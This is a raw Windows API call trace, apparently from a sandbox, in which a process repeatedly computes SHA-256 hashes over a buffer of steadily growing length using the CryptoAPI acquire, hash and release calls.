	[0187.432] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.432] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.432] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0187.432] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.432] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f170
	[0187.432] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f170, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f170, pdwDataLen=0x128aac) returned 1
	[0187.432] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.432] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.432] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.432] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.432] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0187.433] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.433] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f198
	[0187.433] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f198, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f198, pdwDataLen=0x128aac) returned 1
	[0187.433] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.433] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.433] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.433] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.433] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0187.433] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.433] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f1c0
	[0187.433] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f1c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f1c0, pdwDataLen=0x128aac) returned 1
	[0187.433] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.433] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.433] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.434] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.434] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0187.434] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.434] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f1e8
	[0187.434] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f1e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f1e8, pdwDataLen=0x128aac) returned 1
	[0187.434] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.434] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.434] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.435] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.435] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0187.435] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.435] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f210
	[0187.435] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f210, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f210, pdwDataLen=0x128aac) returned 1
	[0187.436] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.436] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.436] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.436] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.436] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0187.436] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f238
	[0187.436] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f238, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f238, pdwDataLen=0x128aac) returned 1
	[0187.436] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.436] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.436] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.436] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.436] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0187.437] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.437] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f260
	[0187.437] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f260, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f260, pdwDataLen=0x128aac) returned 1
	[0187.437] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.437] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.437] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.437] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.437] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0187.437] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.437] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f288
	[0187.437] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f288, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f288, pdwDataLen=0x128aac) returned 1
	[0187.437] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.437] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.437] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.438] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.438] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0187.438] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.438] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f2b0
	[0187.438] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f2b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f2b0, pdwDataLen=0x128aac) returned 1
	[0187.438] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.438] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.438] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.438] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.438] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0187.438] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.438] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f2d8
	[0187.438] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f2d8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f2d8, pdwDataLen=0x128aac) returned 1
	[0187.438] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.438] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.438] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.439] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.439] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0187.439] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.439] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f300
	[0187.439] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f300, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f300, pdwDataLen=0x128aac) returned 1
	[0187.439] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.439] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.439] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.439] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.439] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0187.439] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.439] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f328
	[0187.439] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f328, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f328, pdwDataLen=0x128aac) returned 1
	[0187.439] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.439] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.439] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.440] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.440] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0187.440] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.440] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f350
	[0187.440] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f350, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f350, pdwDataLen=0x128aac) returned 1
	[0187.440] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.440] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.440] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.440] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.440] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0187.440] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.440] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f378
	[0187.440] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f378, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f378, pdwDataLen=0x128aac) returned 1
	[0187.440] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.440] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.440] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.441] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.441] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0187.441] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.441] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f3a0
	[0187.441] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f3a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f3a0, pdwDataLen=0x128aac) returned 1
	[0187.441] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.441] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.441] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.441] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.441] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0187.441] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.441] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f3c8
	[0187.442] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f3c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f3c8, pdwDataLen=0x128aac) returned 1
	[0187.442] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.442] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.442] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.442] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.442] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0187.442] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.442] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f3f0
	[0187.442] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f3f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f3f0, pdwDataLen=0x128aac) returned 1
	[0187.442] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.442] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.442] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.442] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.442] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0187.443] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.443] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f418
	[0187.443] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f418, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f418, pdwDataLen=0x128aac) returned 1
	[0187.443] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.443] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.443] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.443] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.443] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0187.443] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.443] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f440
	[0187.443] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f440, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f440, pdwDataLen=0x128aac) returned 1
	[0187.443] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.443] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.443] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.444] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.444] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0187.444] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.444] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f468
	[0187.444] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f468, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f468, pdwDataLen=0x128aac) returned 1
	[0187.444] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.444] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.444] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.444] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.444] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0187.444] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.444] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f490
	[0187.444] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f490, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f490, pdwDataLen=0x128aac) returned 1
	[0187.444] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.444] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.444] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.445] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.445] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0187.445] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.445] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f4b8
	[0187.445] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f4b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f4b8, pdwDataLen=0x128aac) returned 1
	[0187.445] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.445] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.445] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.445] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.445] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0187.445] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.445] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f4e0
	[0187.445] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f4e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f4e0, pdwDataLen=0x128aac) returned 1
	[0187.445] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.445] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.445] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.446] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.446] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0187.446] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.446] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f508
	[0187.446] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f508, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f508, pdwDataLen=0x128aac) returned 1
	[0187.446] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.446] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.446] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.446] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.446] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0187.446] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.446] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f530
	[0187.446] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f530, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f530, pdwDataLen=0x128aac) returned 1
	[0187.446] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.446] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
